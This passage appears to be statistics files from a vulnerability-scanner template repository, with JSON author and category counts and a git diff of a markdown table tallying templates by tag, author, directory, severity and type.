07","count":7},{"name":"dr_set","count":7},{"name":"divya_mudgal","count":7},{"name":"techryptic (@tech)","count":7},{"name":"randomstr1ng","count":7},{"name":"harshbothra_","count":7},{"name":"amit-jd","count":7},{"name":"leovalcante","count":7},{"name":"pathtaga","count":6},{"name":"imnightmaree","count":6},{"name":"puzzlepeaches","count":6},{"name":"praetorian-thendrickson","count":6},{"name":"__fazal","count":6},{"name":"ricardomaia","count":6},{"name":"iamnoooob","count":6},{"name":"nullfuzz","count":6},{"name":"gitlab red team","count":6},{"name":"_0xf4n9x_","count":6},{"name":"pentest_swissky","count":6},{"name":"rootxharsh","count":6},{"name":"evan rubinstein","count":6},{"name":"forgedhallpass","count":6},{"name":"nodauf","count":5},{"name":"yanyun","count":5},{"name":"prajiteshsingh","count":5},{"name":"joanbono","count":5},{"name":"podalirius","count":5},{"name":"panch0r3d","count":5},{"name":"ganofins","count":5},{"name":"xelkomy","count":5},{"name":"clem9669","count":5},{"name":"scent2d","count":4},{"name":"defr0ggy","count":4},{"name":"wisnupramoedya","count":4},{"name":"robotshell","count":4},{"name":"3th1c_yuk1","count":4},{"name":"its0x08","count":4},{"name":"incogbyte","count":4},{"name":"dolev farhi","count":4},{"name":"dadevel","count":4},{"name":"h1ei1","count":4},{"name":"r3naissance","count":4},{"name":"0xlittleboy","count":4},{"name":"tanq16","count":4},{"name":"e_schultze_","count":4},{"name":"whoever","count":3},{"name":"yuzhe-zhang-0","count":3},{"name":"skeltavik","count":3},{"name":"emenalf","count":3},{"name":"lark-lab","count":3},{"name":"alifathi-h1","count":3},{"name":"kh4sh3i","count":3},{"name":"jarijaas","count":3},{"name":"davidmckennirey","count":3},{"name":"impramodsargar","count":3},{"name":"dr0pd34d","count":3},{"name":"shifacyclewala","count":3},{"name":"fxploit","count":3},{"name":"fyoorer","count":3},{"name":"lucasljm2001","count":3},{"name":"sushantkamble","count":3},{"name":"unstabl3","count":3},{"name":"powerexploit","count":3},{"name":"_generic_human_","count":3},{"name":"swissky","count":3},{"name":"me9187","count":3},{"name":"atomiczsec","count":3},{"name":"f1tz","count":3},{"name":"ph33r","count":3},{"name":"binaryfigments","count":3},{"name":"mr-xn","count":3},{"name":"yash anand @yashanand155","count":3},{"name":"hahwul","count":3},{"name":"z3bd","count":3},{"name":"mavericknerd","count":3},{"name":"thomas_from_offensity","count":3},{"name":"0w4ys","count":3},{"name":"ekrause","count":3},{"name":"andydoering","count":3},{"name":"arcc","count":3},{"name":"splint3r7","count":3},{"name":"johnjhacking","count":3},{"name":"shine","count":3},{"name":"dudez","count":3},{"name":"supras","count":3},{"name":"vavkamil","count":2},{"name":"k11h-de","count":2},{"name":"w4cky_","count":2},{"name":"0xcrypto","count":2},{"name":"pxmme1337","count":2},{"name":"cristi vlad (@cristivlad25)","count":2},{"name":"canberbamber","count":2},{"name":"d4vy","count":2},{"name":"clarkvoss","count":2},{"name":"cocxanh","count":2},{"name":"danielmofer","count":2},{"name":"n-thumann","count":2},{"name":"ehsahil","count":2},{"name":"badboycxcc","count":2},{"name":"ambassify","count":2},{"name":"luci","count":2},{"name":"8arthur","count":2},{"name":"x1m_martijn","count":2},{"name":"true13","count":2},{"name":"bernardofsr","count":2},{"name":"thardt-praetorian","count":2},{"name":"udit_thakkur","count":2},{"name":"r12w4n","count":2},{"name":"0xrudra","count":2},{"name":"mahendra purbia (mah3sec_)","count":2},{"name":"github.com/its0x08","count":2},{"name":"brenocss","count":2},{"name":"zomsop82","count":2},{"name":"smaranchand","count":2},{"name":"sbani","count":2},{"name":"lotusdll","count":2},{"name":"ree4pwn","count":2},{"name":"hetroublemakr","count":2},{"name":"hackerarpan","count":2},{"name":"evergreencartoons","count":2},{"name":"cckuakilong","count":2},{"name":"convisoappsec","count":2},{"name":"nkxxkn","count":2},{"name":"moritz nentwig","count":2},{"name":"socketz","count":2},{"name":"dbrwsky","count":2},{"name":"0xsmiley","count":2},{"name":"thezakman","count":2},{"name":"israel comazzetto dos reis","count":2},{"name":"fabaff","count":2},{"name":"ricardo maia (brainfork)","count":2},{"name":"manas_harsh","count":2},{"name":"redteambrasil","count":2},{"name":"ajaysenr","count":2},{"name":"parth","count":2},{"name":"paradessia","count":2},{"name":"0xnirvana","count":2},{"name":"dheerajmadhukar","count":2},{"name":"g4l1t0","count":2},{"name":"amsda","count":2},{"name":"bsysop","count":2},{"name":"z0ne","count":2},{"name":"myztique","count":2},{"name":"joshlarsen","count":2},{"name":"0xelkomy","count":2},{"name":"afaq","count":2},{"name":"randomrobbie","count":2},{"name":"sy3omda","count":2},{"name":"gevakun","count":2},{"name":"gal nagli","count":2},{"name":"vsh00t","count":2},{"name":"rafaelwdornelas","count":2},{"name":"kiblyn11","count":2},{"name":"v0idc0de","count":2},{"name":"nvn1729","count":2},{"name":"joeldeleep","count":2},{"name":"taielab","count":2},{"name":"kre80r","count":2},{"name":"bananabr","count":2},{"name":"y4er","count":2},{"name":"bing0o","count":2},{"name":"dahse89","count":2},{"name":"mohammedsaneem","count":2},{"name":"666asd","count":2},{"name":"uomogrande","count":2},{"name":"paperpen","count":2},{"name":"nuk3s3c","count":2},{"name":"raesene","count":2},{"name":"korteke","count":2},{"name":"codexlynx","count":2},{"name":"foulenzer","count":2},{"name":"bp0lr","count":2},{"name":"martincodes-de","count":2},{"name":"0xsapra","count":2},{"name":"koti2","count":2},{"name":"geekby","count":2},{"name":"0xprial","count":2},{"name":"huowuzhao","count":2},{"name":"erethon","count":1},{"name":"thebinitghimire","count":1},{"name":"ransomsec","count":1},{"name":"cookiehanhoan","count":1},{"name":"f1she3","count":1},{"name":"udinchan","count":1},{"name":"ldionmarcil","count":1},{"name":"0ut0fb4nd","count":1},{"name":"sec_hawk","count":1},{"name":"retr02332","count":1},{"name":"miroslavsotak","count":1},{"name":"natto97","count":1},{"name":"aceseven (digisec360)","count":1},{"name":"jcockhren","count":1},{"name":"h4kux","count":1},{"name":"jteles","count":1},{"name":"mhdsamx","count":1},{"name":"droberson","count":1},{"name":"sherlocksecurity","count":1},{"name":"jna1","count":1},{"name":"lamscun","count":1},{"name":"brabbit10","count":1},{"name":"ola456","count":1},{"name":"bad5ect0r","count":1},{"name":"petruknisme","count":1},{"name":"ggranjus","count":1},{"name":"djoevanka","count":1},{"name":"bibeksapkota (sar00n)","count":1},{"name":"aringo","count":1},{"name":"jeya seelan","count":1},{"name":"0h1in9e","count":1},{"name":"ahmed sherif","count":1},{"name":"calumjelrick","count":1},{"name":"0xelkomy \u0026 c0nqr0r","count":1},{"name":"zinminphy0","count":1},{"name":"tim_koopmans","count":1},{"name":"aaronchen0","count":1},{"name":"omarkurt","count":1},{"name":"phyr3wall","count":1},{"name":"alperenkesk","count":1},{"name":"kurohost","count":1},{"name":"skylark-lab","count":1},{"name":"rojanrijal","count":1},{"name":"vinit989","count":1},{"name":"8authur","count":1},{"name":"berkdusunur","count":1},{"name":"deena","count":1},{"name":"infosecsanyam","count":1},{"name":"th3.d1p4k","count":1},{"name":"realexp3rt","count":1},{"name":"evan rubinstien","count":1},{"name":"blckraven","count":1},{"name":"af001","count":1},{"name":"bjhulst","count":1},{"name":"notnotnotveg","count":1},{"name":"daffianfo","count":1},{"name":"mubassirpatel","count":1},{"name":"paper-pen","count":1},{"name":"exploitation","count":1},{"name":"akshansh","count":1},{"name":"arr0way","count":1},{"name":"kailashbohara","count":1},{"name":"sicksec","count":1},{"name":"mesaglio","count":1},{"name":"wabafet","count":1},{"name":"daviey","count":1},{"name":"open-sec","count":1},{"name":"noraj","count":1},{"name":"flag007","count":1},{"name":"amnotacat","count":1},{"name":"b0yd","count":1},{"name":"ivo palazzolo (@palaziv)","count":1},{"name":"carlosvieira","count":1},{"name":"furkansayim","count":1},{"name":"0xceba","count":1},{"name":"manasmbellani","count":1},{"name":"dk999","count":1},{"name":"hexcat","count":1},{"name":"allenwest24","count":1},{"name":"luqmaan hadia","count":1},{"name":"ipanda","count":1},{"name":"viondexd","count":1},{"name":"0xtavian","count":1},{"name":"bernardo rodrigues @bernardofsr","count":1},{"name":"ofjaaah","count":1},{"name":"rodnt","count":1},{"name":"orpheus","count":1},{"name":"un-fmunozs","count":1},{"name":"kiks7","count":1},{"name":"rotemreiss","count":1},{"name":"duty_1g","count":1},{"name":"failopen","count":1},{"name":"thesubtlety","count":1},{"name":"manuelbua","count":1},{"name":"b0rn2r00t","count":1},{"name":"iphantasmic","count":1},{"name":"twitter.com/dheerajmadhukar","count":1},{"name":"arall","count":1},{"name":"co0nan","count":1},{"name":"zsusac","count":1},{"name":"x6263","count":1},{"name":"rschio","count":1},{"name":"shiar","count":1},{"name":"pry0cc","count":1},{"name":"retr0","count":1},{"name":"j3ssie/geraldino2","count":1},{"name":"0xd0ff9","count":1},{"name":"alex","count":1},{"name":"lixts","count":1},{"name":"jrolf","count":1},{"name":"noamrathaus","count":1},{"name":"lingtren","count":1},{"name":"adrianmf","count":1},{"name":"official_blackhat13","count":1},{"name":"anon-artist","count":1},{"name":"jeya.seelan","count":1},{"name":"dawid-czarnecki","count":1},{"name":"toufik-airane","count":1},{"name":"ahmed abou-ela","count":1},{"name":"kabirsuda","count":1},{"name":"0xceeb","count":1},{"name":"evolutionsec","count":1},{"name":"harshinsecurity","count":1},{"name":"queencitycyber","count":1},{"name":"knassar702","count":1},{"name":"patralos","count":1},{"name":"alexrydzak","count":1},{"name":"fopina","count":1},{"name":"luskabol","count":1},{"name":"p-l-","count":1},{"name":"yashgoti","count":1},{"name":"ph33rr","count":1},{"name":"udyz","count":1},{"name":"bernardo rodrigues @bernardofsr | andré monteiro @am0nt31r0","count":1},{"name":"charanrayudu","count":1},{"name":"micha3lb3n","count":1},{"name":"regala_","count":1},{"name":"danigoland","count":1},{"name":"ramkrishna sawant","count":1},{"name":"bartu utku sarp","count":1},{"name":"elmahdi","count":1},{"name":"akash.c","count":1},{"name":"exid","count":1},{"name":"izn0u","count":1},{"name":"s1r1u5_","count":1},{"name":"_c0wb0y_","count":1},{"name":"hanlaomo","count":1},{"name":"intx0x80","count":1},{"name":"theabhinavgaur","count":1},{"name":"streetofhackerr007","count":1},{"name":"iampritam","count":1},{"name":"kr1shna4garwal","count":1},{"name":"remonsec","count":1},{"name":"kba@sogeti_esec","count":1},{"name":"opencirt","count":1},{"name":"hardik-rathod","count":1},{"name":"aaron_costello (@conspiracyproof)","count":1},{"name":"httpvoid","count":1},{"name":"shreyapohekar","count":1},{"name":"2rs3c","count":1},{"name":"viniciuspereiras","count":1},{"name":"coldfish","count":1},{"name":"elouhi","count":1},{"name":"piyushchhiroliya","count":1},{"name":"yashanand155","count":1},{"name":"tehtbl","count":1},{"name":"ringo","count":1},{"name":"igibanez","count":1},{"name":"notsoevilweasel","count":1},{"name":"jbaines-r7","count":1},{"name":"matthew nickerson (b0than) @ layer 8 security","count":1},{"name":"higor melgaço (eremit4)","count":1},{"name":"yavolo","count":1},{"name":"mantissts","count":1},{"name":"b4uh0lz","count":1},{"name":"tea","count":1},{"name":"d0rkerdevil","count":1},{"name":"bughuntersurya","count":1},{"name":"lethargynavigator","count":1},{"name":"vzamanillo","count":1},{"name":"ilovebinbash","count":1},{"name":"majidmc2","count":1},{"name":"xeldax","count":1},{"name":"compr00t","count":1},{"name":"lrtk-coder","count":1},{"name":"luqmaan hadia [luqiih](https://github.com/luqiih)","count":1},{"name":"manikanta a.k.a @secureitmania","count":1},{"name":"prettyboyaaditya","count":1},{"name":"ahmetpergamum","count":1},{"name":"ooooooo_q","count":1},{"name":"soyelmago","count":1},{"name":"exceed","count":1},{"name":"francescocarlucci","count":1},{"name":"thevillagehacker","count":1},{"name":"philippdelteil","count":1},{"name":"aresx","count":1},{"name":"0xh7ml","count":1},{"name":"screamy","count":1},{"name":"streetofhackerr007 (rohit soni)","count":1},{"name":"willd96","count":1},{"name":"remi gascou (podalirius)","count":1},{"name":"nielsing","count":1},{"name":"arm!tage","count":1},{"name":"ratnadip gajbhiye","count":1},{"name":"1nf1n7y","count":1},{"name":"zandros0","count":1},{"name":"_harleo","count":1},{"name":"wlayzz","count":1},{"name":"geraldino2","count":1},{"name":"ling","count":1},{"name":"kiransau","count":1},{"name":"revblock","count":1},{"name":"andirrahmani1","count":1},{"name":"sid ahmed malaoui @ realistic security","count":1},{"name":"s0obi","count":1},{"name":"tirtha_mandal","count":1},{"name":"arjunchandarana","count":1},{"name":"0xteles","count":1},{"name":"whynotke","count":1},{"name":"davidfegyver","count":1},{"name":"osamahamad","count":1},{"name":"sickwell","count":1},{"name":"_darrenmartyn","count":1},{"name":"maximus decimus","count":1},{"name":"yuansec","count":1},{"name":"elitebaz","count":1},{"name":"c3l3si4n","count":1},{"name":"0xrod","count":1},{"name":"affix","count":1},{"name":"xshuden","count":1},{"name":"couskito","count":1},{"name":"pudsec","count":1},{"name":"shelld3v","count":1},{"name":"dale clarke","count":1},{"name":"ok_bye_now","count":1},{"name":"florianmaak","count":1},{"name":"lark lab","count":1},{"name":"pratik khalane","count":1},{"name":"miryangjung","count":1},{"name":"aayush vishnoi","count":1},{"name":"5up3r541y4n","count":1},{"name":"dievus","count":1},{"name":"qlkwej","count":1},{"name":"momen eldawakhly","count":1},{"name":"pdp","count":1},{"name":"thelicato","count":1},{"name":"gboddin","count":1},{"name":"jas37","count":1},{"name":"husain","count":1},{"name":"jiheon-dev","count":1},{"name":"pascalheidmann","count":1},{"name":"absshax","count":1},{"name":"j33n1k4","count":1},{"name":"narluin","count":1},{"name":"apt-mirror","count":1},{"name":"push4d","count":1},{"name":"act1on3","count":1},{"name":"ohlinge","count":1},{"name":"becivells","count":1},{"name":"sak1","count":1},{"name":"zhenwarx","count":1},{"name":"secthebit","count":1},{"name":"luqman","count":1},{"name":"schniggie","count":1},{"name":"hakimkt","count":1},{"name":"elder tao","count":1},{"name":"andysvints","count":1},{"name":"shockwave","count":1},{"name":"amanrawat","count":1},{"name":"fq_hsu","count":1},{"name":"pjborah","count":1},{"name":"borna nematzadeh","count":1},{"name":"nytr0gen","count":1},{"name":"undefl0w","count":1},{"name":"justmumu","count":1},{"name":"makyotox","count":1},{"name":"shivampand3y","count":1},{"name":"noobexploiter","count":1},{"name":"nerrorsec","count":1},{"name":"mrcl0wnlab","count":1},{"name":"jbertman","count":1},{"name":"ptonewreckin","count":1},{"name":"xstp","count":1},{"name":"mah3sec_","count":1},{"name":"kareemse1im","count":1},{"name":"liquidsec","count":1},{"name":"fmunozs","count":1},{"name":"y0no","count":1},{"name":"mass0ma","count":1},{"name":"rubina119","count":1},{"name":"furkansenan","count":1},{"name":"rotembar","count":1},{"name":"juicypotato1","count":1},{"name":"oscarintherocks","count":1},{"name":"sshell","count":1},{"name":"bywalks","count":1},{"name":"kaizensecurity","count":1},{"name":"w0tx","count":1},{"name":"tirtha","count":1},{"name":"unkl4b","count":1},{"name":"clment cruchet","count":1},{"name":"nagli","count":1},{"name":"dhiyaneshdki","count":1},{"name":"nobody","count":1},{"name":"hakluke","count":1},{"name":"chron0x","count":1},{"name":"alevsk","count":1},{"name":"sinkettu","count":1},{"name":"shifacyclewla","count":1},{"name":"marcos_iaf","count":1},{"name":"kishore krishna (sillydaddy)","count":1},{"name":"breno_css","count":1}],"directory":[{"name":"cves","count":1504},{"name":"exposed-panels","count":751},{"name":"vulnerabilities","count":517},{"name":"misconfiguration","count":338},{"name":"technologies","count":306},{"name":"exposures","count":300},{"name":"token-spray","count":235},{"name":"workflows","count":190},{"name":"default-logins","count":113},{"name":"file","count":77},{"name":"takeovers","count":68},{"name":"network","count":56},{"name":"iot","count":40},{"name":"cnvd","count":25},{"name":"miscellaneous","count":25},{"name":"dns","count":17},{"name":"fuzzing","count":12},{"name":"ssl","count":8},{"name":"headless","count":7}],"severity":[{"name":"info","count":1618},{"name":"high","count":1135},{"name":"medium","count":822},{"name":"critical","count":540},{"name":"low","count":260},{"name":"unknown","count":23}],"types":[{"name":"http","count":4218},{"name":"file","count":77},{"name":"network","count":70},{"name":"dns","count":17}]} diff --git a/TEMPLATES-STATS.md b/TEMPLATES-STATS.md index fca8ea0acb..e0bfa1f808 100644 --- a/TEMPLATES-STATS.md +++ b/TEMPLATES-STATS.md @@ -1,2160 +1,2196 @@ -| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | -|-------------------------------|-------|-------------------------------------|-------|------------------|-------|----------|-------|---------|-------| -| cve | 1510 | dhiyaneshdk | 679 | cves | 1488 | info | 1604 | http | 4170 | -| panel | 736 | daffainfo | 657 | exposed-panels | 741 | high | 1127 | file | 77 | -| edb | 574 | pikpikcu | 340 | vulnerabilities | 517 | medium | 812 | network | 68 | -| xss | 526 | pdteam | 274 | misconfiguration | 322 | critical | 534 | dns | 17 | -| lfi | 518 | geeknik | 196 | technologies | 303 | low | 249 | | | -| exposure | 505 | dwisiswant0 | 171 | exposures | 299 | unknown | 21 | | | -| wordpress | 455 | 0x_akoko | 169 | token-spray | 235 | | | | | -| cve2021 | 365 | ritikchaddha | 159 | workflows | 190 | | | | | -| wp-plugin | 350 | pussycat0x | 155 | default-logins | 111 | | | | | -| rce | 342 | princechaddha | 151 | file | 77 | | | | | -| tech | 316 | gy741 | 131 | takeovers | 68 | | | | | -| packetstorm | 290 | arafatansari | 98 | network | 54 | | | | | -| wpscan | 242 | madrobot | 65 | iot | 39 | | | | | -| cve2022 | 240 | zzeitlin | 64 | miscellaneous | 25 | | | | | -| token-spray | 235 | tess | 60 | cnvd | 25 | | | | | -| cve2020 | 217 | idealphase | 60 | dns | 17 | | | | | -| misconfig | 197 | akincibor | 51 | fuzzing | 12 | | | | | -| | 195 | for3stco1d | 47 | ssl | 8 | | | | | -| unauth | 183 | gaurang | 42 | headless | 7 | | | | | -| wp | 172 | philippedelteil | 36 | | | | | | | -| kev | 167 | adam crosser | 30 | | | | | | | -| config | 162 | c-sh0 | 26 | | | | | | | -| cve2018 | 145 | ice3man | 26 | | | | | | | -| cve2019 | 137 | edoardottt | 25 | | | | | | | -| joomla | 135 | organiccrap | 24 | | | | | | | -| oast | 127 | righettod | 22 | | | | | | | -| default-login | 127 | ffffffff0x | 22 | | | | | | | -| apache | 124 | techbrunchfr | 21 | | | | | | | -| iot | 119 | theamanrawat | 20 | | | | | | | -| authenticated | 116 | cckuailong | 17 | | | | | | | -| cve2010 | 111 | sullo | 17 | | | | | | | -| sqli | 108 | sheikhrishad | 15 | | | | | | | -| router | 90 | pr3r00t | 15 | | | | | | | -| files | 89 | milo2012 | 14 | | | | | | | -| redirect | 89 | r3dg33k | 14 | | | | | | | -| login | 88 | sharath | 13 | | | | | | | -| devops | 75 | tenbird | 13 | | | | | | | -| takeover | 74 | johnk3r | 13 | | | | | | | -| token | 73 | 0ri2n | 13 | | | | | | | -| ssrf | 72 | melbadry9 | 12 | | | | | | | -| network | 71 | random-robbie | 12 | | | | | | | -| cve2017 | 70 | suman_kar | 12 | | | | | | | -| cms | 67 | wdahlenb | 11 | | | | | | | -| auth-bypass | 64 | cyllective | 11 | | | | | | | -| file | 63 | elsfa7110 | 11 | | | | | | | -| oracle | 62 | dogasantos | 11 | | | | | | | -| intrusive | 58 | nadino | 10 | | | | | | | -| seclists | 56 | hackergautam | 10 | | | | | | | -| disclosure | 54 | meme-lord | 10 | | | | | | | -| install | 53 | random_robbie | 10 | | | | | | | -| cve2016 | 49 | alph4byt3 | 10 | | | | | | | -| cisco | 49 | logicalhunter | 10 | | | | | | | -| oss | 48 | emadshanab | 9 | | | | | | | -| google | 48 | oppsec | 9 | | | | | | | -| cve2015 | 47 | 0x240x23elu | 9 | | | | | | | -| fileupload | 47 | aashiq | 8 | | | | | | | -| adobe | 45 | that_juan_ | 8 | | | | | | | -| aem | 41 | veshraj | 8 | | | | | | | -| cve2014 | 41 | zh | 8 | | | | | | | -| plugin | 41 | iamthefrogy | 8 | | | | | | | -| vulhub | 38 | leovalcante | 7 | | | | | | | -| vmware | 38 | kophjager007 | 7 | | | | | | | -| atlassian | 37 | dr_set | 7 | | | | | | | -| logs | 36 | techryptic (@tech) | 7 | | | | | | | -| traversal | 35 | caspergn | 7 | | | | | | | -| springboot | 35 | divya_mudgal | 7 | | | | | | | -| tenable | 35 | harshbothra_ | 7 | | | | | | | -| hackerone | 33 | randomstr1ng | 7 | | | | | | | -| injection | 33 | amit-jd | 7 | | | | | | | -| jira | 32 | nullfuzz | 6 | | | | | | | -| listing | 31 | puzzlepeaches | 6 | | | | | | | -| kubernetes | 29 | rootxharsh | 6 | | | | | | | -| huntr | 28 | _0xf4n9x_ | 6 | | | | | | | -| generic | 28 | __fazal | 6 | | | | | | | -| dns | 27 | pathtaga | 6 | | | | | | | -| log4j | 26 | praetorian-thendrickson | 6 | | | | | | | -| debug | 26 | forgedhallpass | 6 | | | | | | | -| sap | 25 | pentest_swissky | 6 | | | | | | | -| cnvd | 25 | ricardomaia | 6 | | | | | | | -| microsoft | 24 | evan rubinstein | 6 | | | | | | | -| proxy | 23 | lu4nx | 6 | | | | | | | -| misc | 23 | imnightmaree | 6 | | | | | | | -| jndi | 23 | iamnoooob | 6 | | | | | | | -| php | 22 | panch0r3d | 5 | | | | | | | -| aws | 22 | xelkomy | 5 | | | | | | | -| wp-theme | 21 | podalirius | 5 | | | | | | | -| manageengine | 21 | yanyun | 5 | | | | | | | -| fuzz | 21 | joanbono | 5 | | | | | | | -| zoho | 21 | prajiteshsingh | 5 | | | | | | | -| weblogic | 20 | ganofins | 5 | | | | | | | -| cve2012 | 20 | nodauf | 5 | | | | | | | -| k8s | 19 | clem9669 | 5 | | | | | | | -| deserialization | 19 | its0x08 | 4 | | | | | | | -| cicd | 19 | defr0ggy | 4 | | | | | | | -| api | 19 | incogbyte | 4 | | | | | | | -| tomcat | 19 | tanq16 | 4 | | | | | | | -| camera | 19 | 0xlittleboy | 4 | | | | | | | -| cloud | 19 | wisnupramoedya | 4 | | | | | | | -| service | 18 | r3naissance | 4 | | | | | | | -| dlink | 18 | h1ei1 | 4 | | | | | | | -| ibm | 18 | dadevel | 4 | | | | | | | -| wavlink | 17 | e_schultze_ | 4 | | | | | | | -| ftp | 17 | 3th1c_yuk1 | 4 | | | | | | | -| firewall | 17 | dolev farhi | 4 | | | | | | | -| jenkins | 17 | robotshell | 4 | | | | | | | -| struts | 16 | scent2d | 4 | | | | | | | -| cve2011 | 15 | f1tz | 3 | | | | | | | -| gitlab | 15 | shifacyclewala | 3 | | | | | | | -| xxe | 15 | splint3r7 | 3 | | | | | | | -| cve2009 | 15 | powerexploit | 3 | | | | | | | -| nginx | 15 | skeltavik | 3 | | | | | | | -| java | 14 | alifathi-h1 | 3 | | | | | | | -| hp | 14 | gitlab red team | 3 | | | | | | | -| msf | 14 | impramodsargar | 3 | | | | | | | -| printer | 14 | sushantkamble | 3 | | | | | | | -| android | 14 | ph33r | 3 | | | | | | | -| fortinet | 14 | me9187 | 3 | | | | | | | -| domainmod | 14 | andydoering | 3 | | | | | | | -| amazon | 13 | 0w4ys | 3 | | | | | | | -| cve2013 | 13 | whoever | 3 | | | | | | | -| status | 13 | binaryfigments | 3 | | | | | | | -| woocommerce | 13 | lucasljm2001 | 3 | | | | | | | -| lfr | 13 | arcc | 3 | | | | | | | -| magento | 13 | davidmckennirey | 3 | | | | | | | -| abstractapi | 13 | lark-lab | 3 | | | | | | | -| netsweeper | 12 | _generic_human_ | 3 | | | | | | | -| confluence | 12 | unstabl3 | 3 | | | | | | | -| rails | 12 | jarijaas | 3 | | | | | | | -| backup | 12 | dr0pd34d | 3 | | | | | | | -| graphql | 12 | shine | 3 | | | | | | | -| microweber | 12 | emenalf | 3 | | | | | | | -| ruijie | 12 | thomas_from_offensity | 3 | | | | | | | -| netgear | 12 | dudez | 3 | | | | | | | -| drupal | 12 | yash anand @yashanand155 | 3 | | | | | | | -| fortigate | 11 | z3bd | 3 | | | | | | | -| ssl | 11 | fxploit | 3 | | | | | | | -| azure | 11 | yuzhe-zhang-0 | 3 | | | | | | | -| cve2008 | 11 | johnjhacking | 3 | | | | | | | -| vpn | 11 | mavericknerd | 3 | | | | | | | -| cisa | 11 | atomiczsec | 3 | | | | | | | -| cnvd2021 | 11 | ekrause | 3 | | | | | | | -| webserver | 11 | supras | 3 | | | | | | | -| github | 11 | hahwul | 3 | | | | | | | -| backdoor | 11 | fyoorer | 3 | | | | | | | -| airflow | 11 | mr-xn | 3 | | | | | | | -| django | 10 | bsysop | 2 | | | | | | | -| zyxel | 10 | koti2 | 2 | | | | | | | -| dell | 10 | nuk3s3c | 2 | | | | | | | -| ruby | 10 | bing0o | 2 | | | | | | | -| jolokia | 10 | cocxanh | 2 | | | | | | | -| coldfusion | 10 | github.com/its0x08 | 2 | | | | | | | -| glpi | 10 | luci | 2 | | | | | | | -| laravel | 10 | thezakman | 2 | | | | | | | -| spring | 10 | mohammedsaneem | 2 | | | | | | | -| grafana | 10 | ree4pwn | 2 | | | | | | | -| windows | 9 | badboycxcc | 2 | | | | | | | -| iis | 9 | 0xprial | 2 | | | | | | | -| wso2 | 9 | dbrwsky | 2 | | | | | | | -| zabbix | 9 | true13 | 2 | | | | | | | -| sonicwall | 9 | thardt-praetorian | 2 | | | | | | | -| git | 9 | udit_thakkur | 2 | | | | | | | -| ssti | 9 | amsda | 2 | | | | | | | -| zimbra | 9 | foulenzer | 2 | | | | | | | -| mirai | 9 | sbani | 2 | | | | | | | -| vcenter | 9 | mahendra purbia (mah3sec_) | 2 | | | | | | | -| kube | 9 | hetroublemakr | 2 | | | | | | | -| dedecms | 9 | canberbamber | 2 | | | | | | | -| fastjson | 9 | fabaff | 2 | | | | | | | -| phpmyadmin | 9 | 0xsapra | 2 | | | | | | | -| prometheus | 9 | taielab | 2 | | | | | | | -| scada | 8 | ehsahil | 2 | | | | | | | -| auth | 8 | moritz nentwig | 2 | | | | | | | -| jboss | 8 | vsh00t | 2 | | | | | | | -| citrix | 8 | ricardo maia (brainfork) | 2 | | | | | | | -| solr | 8 | huowuzhao | 2 | | | | | | | -| metadata | 8 | myztique | 2 | | | | | | | -| hms | 8 | geekby | 2 | | | | | | | -| cisco-switch | 8 | bernardofsr | 2 | | | | | | | -| headless | 8 | zomsop82 | 2 | | | | | | | -| kafka | 8 | y4er | 2 | | | | | | | -| config-audit | 8 | hackerarpan | 2 | | | | | | | -| audit | 8 | vavkamil | 2 | | | | | | | -| recon | 8 | raesene | 2 | | | | | | | -| elasticsearch | 8 | ambassify | 2 | | | | | | | -| squirrelmail | 7 | cristi vlad (@cristivlad25) | 2 | | | | | | | -| cnvd2020 | 7 | smaranchand | 2 | | | | | | | -| exchange | 7 | clarkvoss | 2 | | | | | | | -| go | 7 | rafaelwdornelas | 2 | | | | | | | -| docker | 7 | joshlarsen | 2 | | | | | | | -| icewarp | 7 | gal nagli | 2 | | | | | | | -| opencats | 7 | evergreencartoons | 2 | | | | | | | -| symfony | 7 | r12w4n | 2 | | | | | | | -| firebase | 7 | 8arthur | 2 | | | | | | | -| bucket | 7 | 0xcrypto | 2 | | | | | | | -| jetbrains | 7 | kre80r | 2 | | | | | | | -| solarview | 7 | lotusdll | 2 | | | | | | | -| druid | 7 | parth | 2 | | | | | | | -| mail | 7 | convisoappsec | 2 | | | | | | | -| maps | 7 | manas_harsh | 2 | | | | | | | -| npm | 7 | swissky | 2 | | | | | | | -| blind | 7 | korteke | 2 | | | | | | | -| nodejs | 7 | uomogrande | 2 | | | | | | | -| python | 7 | redteambrasil | 2 | | | | | | | -| ssh | 7 | bp0lr | 2 | | | | | | | -| seeyon | 7 | pxmme1337 | 2 | | | | | | | -| cobbler | 6 | 0xrudra | 2 | | | | | | | -| jetty | 6 | z0ne | 2 | | | | | | | -| ofbiz | 6 | dahse89 | 2 | | | | | | | -| rconfig | 6 | kh4sh3i | 2 | | | | | | | -| lucee | 6 | gevakun | 2 | | | | | | | -| emerge | 6 | paperpen | 2 | | | | | | | -| slack | 6 | cckuakilong | 2 | | | | | | | -| sitecore | 6 | ajaysenr | 2 | | | | | | | -| opensis | 6 | kiblyn11 | 2 | | | | | | | -| bypass | 6 | n-thumann | 2 | | | | | | | -| bigip | 6 | x1m_martijn | 2 | | | | | | | -| magmi | 6 | danielmofer | 2 | | | | | | | -| websphere | 6 | v0idc0de | 2 | | | | | | | -| enum | 6 | israel comazzetto dos reis | 2 | | | | | | | -| huawei | 6 | k11h-de | 2 | | | | | | | -| jamf | 6 | codexlynx | 2 | | | | | | | -| kubelet | 6 | 0xsmiley | 2 | | | | | | | -| setup | 6 | 0xnirvana | 2 | | | | | | | -| ecology | 6 | bananabr | 2 | | | | | | | -| activemq | 6 | 666asd | 2 | | | | | | | -| fpd | 6 | brenocss | 2 | | | | | | | -| ognl | 6 | w4cky_ | 2 | | | | | | | -| moodle | 6 | nkxxkn | 2 | | | | | | | -| vms | 6 | socketz | 2 | | | | | | | -| microstrategy | 6 | joeldeleep | 2 | | | | | | | -| zhiyuan | 6 | martincodes-de | 2 | | | | | | | -| openvpn | 6 | afaq | 2 | | | | | | | -| liferay | 6 | d4vy | 2 | | | | | | | -| samsung | 6 | randomrobbie | 2 | | | | | | | -| crlf | 6 | nvn1729 | 2 | | | | | | | -| artica | 6 | g4l1t0 | 2 | | | | | | | -| carrental | 5 | 0xelkomy | 2 | | | | | | | -| elfinder | 5 | dheerajmadhukar | 2 | | | | | | | -| alibaba | 5 | paradessia | 2 | | | | | | | -| strapi | 5 | sy3omda | 2 | | | | | | | -| storage | 5 | d0rkerdevil | 1 | | | | | | | -| cockpit | 5 | nobody | 1 | | | | | | | -| 74cms | 5 | schniggie | 1 | | | | | | | -| solarwinds | 5 | xstp | 1 | | | | | | | -| apisix | 5 | nielsing | 1 | | | | | | | -| plesk | 5 | fopina | 1 | | | | | | | -| redis | 